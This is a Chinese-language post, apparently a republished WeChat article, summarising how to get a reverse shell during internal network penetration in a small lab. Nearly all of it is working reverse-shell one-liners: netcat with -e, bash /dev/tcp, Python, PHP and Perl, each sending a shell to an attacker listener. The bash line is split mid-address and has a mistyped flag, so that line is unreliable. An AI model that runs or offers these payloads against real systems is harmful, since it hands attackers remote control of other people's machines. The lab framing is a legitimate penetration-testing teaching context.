内网渗透:nc反弹shell总结
2022-9-21 08:5:37 Author: 网络安全学习圈(查看原文) 阅读量:22 收藏

在下方公众号后台回复:【面试宝典】,可获取给你准备的104页网络安全面试宝典。

1、实验环境

Kali:192.168.32.132 //模拟靶机

Windows:192.168.32.1 //模拟公网vps

2、若靶机上存在nc,获取反向shell:

vps攻击机:nc -lvp 9999      // 监听9999端口
靶机:nc 1.1.1.1 9999 -e /bin/bash  // Linux正向连接公网vps1.1.1.1的9999端口
     nc 1.1.1.1 9999 -e c:\windows\system32\cmd.exe  // Windows

3、若靶机上不存在nc,可用如下几种方式进行代替:

(1) Bash反弹shell

vps攻击机:nc -lvp 6666
靶机:bash -I >& /dev/tcp/19
2.168.32.1/6666 0>&1

(2)靶机存在Python环境,Python反弹shell

vps攻击机:nc -lvp 6666
靶机:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.32.1",6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

(3)靶机存在PHP环境,PHP反向shell:

vps攻击机:nc -lvp 6666
靶机:php -r '$sock=fsockopen("192.168.32.1",6666);exec("/bin/sh -i <&3 >&3 2>&3");'

(4)靶机存在Perl环境,Perl反弹shell:

Vps攻击机:nc -lvp 6666
靶机:perl -e 'use Socket; $i="192.168.32.1";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'=

- End -

近期课程上新:

Windows服务安全 | 以太网交换与路由技术 | Linux安全运维 | Web安全 | 灰帽编程 | 渗透测试  | 安全化概述与虚拟化 | 跨站脚本攻击 


文章来源: http://mp.weixin.qq.com/s?__biz=MzIxMTcyMjg2MA==&mid=2247492445&idx=1&sn=4c68884d2ddadb5ad806d1754b6f648c&chksm=9752545ea025dd483a1b68dfbe0f330cfd3d332ddaddcb0ed297dcbdc4ec4ca6f2c19f11fdd8#rd
如有侵权请联系:admin#unsafe.sh